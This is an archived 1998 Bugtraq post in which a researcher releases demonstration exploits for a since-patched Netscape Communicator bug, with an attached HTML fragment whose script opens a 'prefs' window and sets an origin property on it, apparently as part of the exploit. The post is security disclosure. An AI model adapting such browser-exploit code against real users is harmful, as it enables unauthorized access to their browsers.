Bugtraq mailing list archives
Communicator exploits
From: fernand.portela () IBM NET (Fernand Portela)
Date: Fri, 10 Apr 1998 14:06:08 +0200
This is a multi-part message in MIME format. --------------C3265FC716C909831247B1CC Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi, A few weeks ago, I've posted in this mailing-list an advisory about issues in Netscape Communicator. Since a fixed release (4.05) is now available to users, I think I can publish the exploits themselves. If you received this mail in Communicator 4.04 or previous (NN2.x and 3.x are not vulnerable), simply click the links in the attached HTML document for a demonstration of the bugs. _______________________________________________________________________ Fernand PORTELA aka Nando fernand.portela () ibm net nando () mygale org http://www.mygale.org/~nando --------------C3265FC716C909831247B1CC Content-Type: text/html; charset=us-ascii; name="attacks.html" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="attacks.html" <html> <head> <script><!-- function load_page() { w = window.open( '', 'prefs' ); w.origin = window.document.URL; } //--></script> </head> <body> <p>Click here for a demonstration of the first exploit. <p>Click here for a demonstration of the second exploit. </body> </html> --------------C3265FC716C909831247B1CC--
Current thread:
- portmap 4.0-8 DoS, (continued)
- portmap 4.0-8 DoS Michal Zalewski (Apr 01)
- Re: portmap 4.0-8 DoS Peter van Dijk (Apr 07)
- BSDI inetd crash Mark Schaefer (Apr 07)
- Re: BSDI inetd crash FrontLine Assembly (Apr 08)
- SGI O2 ipx security issue Fabrice Planchon (Apr 08)
- BIND vulnerability test program.. Joshua J. Drake (Apr 09)
- (Q) Sun Rpcbind problem. Chiaki Ishikawa (Apr 10)
- Re: (Q) Sun Rpcbind problem. Casper Dik (Apr 10)
- Wietse's RPCBIND Wietse Venema (Apr 10)
- announce: weaken for netscape !! (fwd) Ken Williams (Apr 10)
- Communicator exploits Fernand Portela (Apr 10)
- Sun rpcbind Nicolas Dubee (Apr 10)
- Re: Sun rpcbind Aaron Bornstein (Apr 10)
- portmap 4.0-8 DoS Michal Zalewski (Apr 01)
- QW vulnerability Glenn F. Maynard (Apr 07)
- AppleShare IP Mail Server Chris Wedgwood (Apr 07)
- Re: AppleShare IP Mail Server David Luyer (Apr 07)
- Re: AppleShare IP Mail Server James W. Abendschan (Apr 07)
- Re: Geac ADVANCE library system security HOLE Damian Kelly (Apr 03)
- Announce : Nessus Alpha 1 Renaud Deraison (Apr 04)
- mailrc and pine security holes Michal Zalewski (Apr 05)